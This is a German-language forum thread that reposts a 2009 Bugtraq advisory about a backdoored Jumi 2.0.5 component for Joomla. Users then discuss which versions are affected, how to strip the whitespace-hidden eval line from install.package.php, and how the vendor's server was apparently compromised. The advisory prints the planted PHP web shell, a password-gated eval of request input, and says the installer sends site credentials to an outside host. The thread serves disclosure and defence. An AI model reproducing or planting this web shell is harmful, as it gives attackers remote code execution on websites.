com_jumi / jumi 2.0.5 for joomla 1.5 backdoored

**keraM** · 30.10.2009 16:01

Date: Fri, 30 Oct 2009 09:00:52 +0200
Message-ID: <f1823b730910300000t19639bc1ic83b67289ab08440@mail .gmail.com>
Subject: com_jumi / jumi 2.0.5 for joomla 1.5 backdoored
From: Jan van Niekerk <jvnkrk@gmail.com>
To: bugtraq <bugtraq@securityfocus.com>
Cc: abuse@ispgateway.de

Summary: another backdoored joomla component (yawn)

Application: Jumi, a joomla component

About Jumi:
Jumi is the set of custom code extensions for Joomla! 1.0.x and 1.5.x in
their native modes. Since 2006 more then 200.000 downloads. With Jumi you
can include php, html, javascript scripts into the modules position,
articles, category or section descriptions, or into your own custom made
component pages.
Fun snippet from the release_notes.txt:
Changes:
- Fixed: security vulnerability
Vendor notified:
*.cz .. I looked at the fun pictures on the "about us" screen, and
left it at that.
Joomla? A CC of this mail on their "STRIKE TEAM" form (are you
afraid of e-mail gentlemen?)

Download url/s:
http://extensions.joomla.org/extensions/search/jumi
http://jumi.vedeme.cz/index.php?opti...tory&Itemid=53
http://jumi.vedeme.cz/index.php?opti...tartdown&id=56

md5sum:
1037de7cc97ba348440a93db1ee89400 jumi_pack_2.0.5_for_J1.5.zip

The installation sends your joomla URL and passwords to
http://my-wnl.org/index.php and drops the following file:

modules/mod_mainmenu/tmpl/.config.php

Which says that the loveless individual who did the backdooring
doesn't like to share (c'mon man, give a bit):

<?php
if(empty ($_REQUEST['key']) ||
sha1(md5($_REQUEST['key']))!='0b6045b268cf676864a27d9663cee0a634431467'){he ader("HTTP/1.0
404 Not Found"); exit();}
header("Content-Type: Text/Plain");
eval(stripslashes($_REQUEST['php']));
?>

abuse@ispgateway.de: you are hosting the backdoor notification site

**progandy** · 30.10.2009 16:17

Oh, gut dass ich noch 2.0.4 hab

//Edit: Das updatepack von 2.0.4 auf 2.0.5 sieht auch sauber aus

**keraM** · 30.10.2009 16:29

Zitat von progandy

Oh, gut dass ich noch 2.0.4 hab

Das macht's nicht besser: http://milw0rm.com/exploits/8968

**progandy** · 30.10.2009 16:34

Ohh, ja ich mach gleich das update drauf, zum Glück ist erst seit gestern die Seite on

Zur backdoor:
Ich habe bisher nur in folgender Datei was gefunden:
jumi_pack_2.0.5_for_J1.5\admin\install.package.php, Zeile 5
Achtung: der Code ist mit sehr vielen Leerzeichen eingerückt, damit man ihn übersieht!

**BenjaminF.** · 30.10.2009 17:28

Betrifft es alle Versionen von Jumi?
In dieser Liste finde ich nur die 2.0.3: http://www.joomla-downloads.de/unsic...component.html

Ich verwende auf einer Seite noch 2.0.1 u. würde mich daher über eine Antwort freuen.

Vielen Dank vorab

**progandy** · 30.10.2009 17:36

Also, meine 2.0.4 hatte es nicht drin

Und der Updatepack von 2.0.4 auf 2.0.5 ist auch sauber.
Ältere Versionen kenn ich jezt nicht, aber die haben sicher andere Sicherheitslücken, so wie die 2.0.4.

Und wenn du von 2.0.1 aus 2.0.5 installieren willst, dann musst du vor der Installation das 2.0.5 zip entpacken,
jumi_pack_2.0.5_for_J1.5\admin\install.package.php , Zeile 5 löschen
(Achtung: der Code ist mit sehr vielen Leerzeichen eingerückt, damit man ihn übersieht!)
(In der zeile steht was mit eval, gzinflate und bse64_decode -> der verschlüsselte backdoor-Code)
->wieder packen und installieren

Ich habe keine weiteren Einträge gefunden, aber vielleicht hab ich auch was übersehen

**BenjaminF.** · 30.10.2009 18:03

Verstehe ich es richtig das der schadhafte Code vom Entwickler stammt????

Die gleiche Datei der 2.0.1 schaut wie folgt aus:

<?php
defined("_JEXEC") or die("Restricted access");

// installing module
$module_installer = new JInstaller;
if($module_installer->install(dirname(__FILE__).DS.'module'))
echo 'Module install success', '<br />';
else
echo 'Module install failed', '<br />';

// installing plugin
$plugin_installer = new JInstaller;
if($plugin_installer->install(dirname(__FILE__).DS.'plugin'))
echo 'Plugin install success', '<br />';
else
echo 'Plugin install failed', '<br />';

Einen versteckten Code auch beim Seitwärtsscrollen sehe ich nicht.

**progandy** · 30.10.2009 18:38

2.0.1 hat ihn wohl noch nicht. das ist so wie es aussieht, erst seit 2.0.5 drin

Ich hab gerade noch mal einen Diff zwischen 2.0.4 und 2.0.5 gemacht:
Nur diese eine Zeile ist dazugekommen...
Sonst hat sich nichts verändert, außer den Versionsnummern ...
NICHTS, da ist in 2.0.5 nur die backdoor reingekommen!

@keraM: http://milw0rm.com/exploits/8968 -> das ist wohl schon in 2.0.4 gefixt
\components\com_jumi\jumi.php

Code:

$fileid    = JRequest::getInt('fileid');

**DennisBahns** · 02.11.2009 22:06

Zitat von progandy

2.0.1 hat ihn wohl noch nicht. das ist so wie es aussieht, erst seit 2.0.5 drin

Ich hab gerade noch mal einen Diff zwischen 2.0.4 und 2.0.5 gemacht:
Nur diese eine Zeile ist dazugekommen...
Sonst hat sich nichts verändert, außer den Versionsnummern ...
NICHTS, da ist in 2.0.5 nur die backdoor reingekommen!

Ich hole den Thread noch mal hoch, da sich mir eine Frage stellt:
Wieso wurde sowas als Update veröffentlicht bzw. war es ein offizielles Update des Entwicklers?
Was sind Beweggründe für einen Entwickler, Schadcode in seine Komponente einzubauen bzw. war es Absicht? Für mich ist das momentan unbegreiflich.

**zenadept** · 03.11.2009 06:39

Zitat von DennisBahns

Ich hole den Thread noch mal hoch, da sich mir eine Frage stellt:
Wieso wurde sowas als Update veröffentlicht bzw. war es ein offizielles Update des Entwicklers?
Was sind Beweggründe für einen Entwickler, Schadcode in seine Komponente einzubauen bzw. war es Absicht? Für mich ist das momentan unbegreiflich.

Also so wie ich das verstanden habe, wurde der Server gehackt, vermutlich ist ein FTP-Passwort ausgespäht worden. Die Änderungen wurden an den Paketen nachträglich vorgenommen. Dann hat er ein Backup eingespielt und eine neue Version mit der gleichen Nummer rausgebracht. Da ja Missverständnisse dann vorprogrammiert...

Thema: com_jumi / jumi 2.0.5 for joomla 1.5 backdoored

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

com_jumi / jumi 2.0.5 for joomla 1.5 backdoored

Erhielt Danksagungen von:

Lesezeichen

Lesezeichen

Berechtigungen